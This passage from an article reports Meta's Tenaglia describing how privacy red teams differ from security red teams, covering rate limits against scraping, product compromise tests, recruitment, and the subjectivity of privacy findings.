Similarly, the focus of a security red team includes mitigating an attack surface. The security red team engages in reconnaissance by scanning their own firewalls, and if they can't break into the network, that suggests there are no vulnerabilities, Tenaglia noted. If a member of the security red team successfully gets through the firewall, however, that would signal the need to get to the source of the vulnerabilities.

Meanwhile, a privacy red team is more focused on large-scale access to personal user information and data, Tenaglia said. A common way of mitigating that risk is by applying rate limits, allowing access to a specific amount of data during a particular time.

"Anytime you find access to sensitive data or important data, things you didn't think you shouldn't get access to, the first thing you're going to do is see how much more of it you can get. You're going to scale up that access. You're going to scrape," Tenaglia said. "If those rate limits are working well, then you probably aren't able to do much there. Otherwise, you probably need to make some tweaks to the rate limits."

**The Separate Goals of Security and Privacy Adversaries**

Tenaglia also described the differences in motives among security threat actors and privacy adversaries. Security adversaries who issue APTs tend to have infinite timescales and resources and usually target specific companies seeking to steal corporate assets. In contrast, privacy red teams go after users' individual or personal information, he said.

Despite the differences, Tenaglia said he believes in recruiting security professionals to join privacy red teams. For example, someone with in-depth knowledge of Linux or Windows makes a good candidate because of their experience breaking apart the operating system.

"We don't really want your knowledge of Windows and Linux — because of course we're not attacking those things — \[but\] we do want your skill set and your know-how to manipulate those things to apply that skill set to our platforms, Facebook, Instagram, Messenger, etc.," Tenaglia said. "And we can teach and give you the knowledge to make you successful manipulating those things."

He added that a critical requirement for someone on a privacy red team is to have privacy instincts. Aside from the distinct focus of privacy red teams, Tenaglia noted that at Meta, they partner with the legal, risk, and security teams.

Tenaglia said that the Meta privacy red team's version of a penetration test is what they call a product compromise test. Besides finding vulnerabilities that give access to user data, the attackers also look to squeeze data out of APIs, which contain various forms of data or connection to data sources. Another exploration is adversarial emulation operations, where an intruder tries to gain access to user data by creating accounts.

**The Subjectivity Issue With Privacy Findings**

Tenaglia explained that findings of privacy vulnerabilities can be much more subjective than security flaws because three different factors influence the very notion of a finding.

First, where an organization operates in the world brings different laws and regulations into effect that can influence the finding. Second, perception of privacy violation is colored by the statements an organization has issued on how it protects users' data.

And third, "even if the prior two are true — meaning your finding is in line with the company statements and it's not violating the law or regulation — you, as a user of that same platform, may say to yourself, 'For me as a user, I still don't think this means the expectation of privacy,'" Tenaglia said. "And you might want to call that a finding."

In the future, Tenaglia said he is hoping for the privacy red team to move from the subjective to the objective. For that to happen, the team needs to "understand these privacy weaknesses better, and to understand how to do privacy by design," he said. "I think we'll get there."

Tag

#windows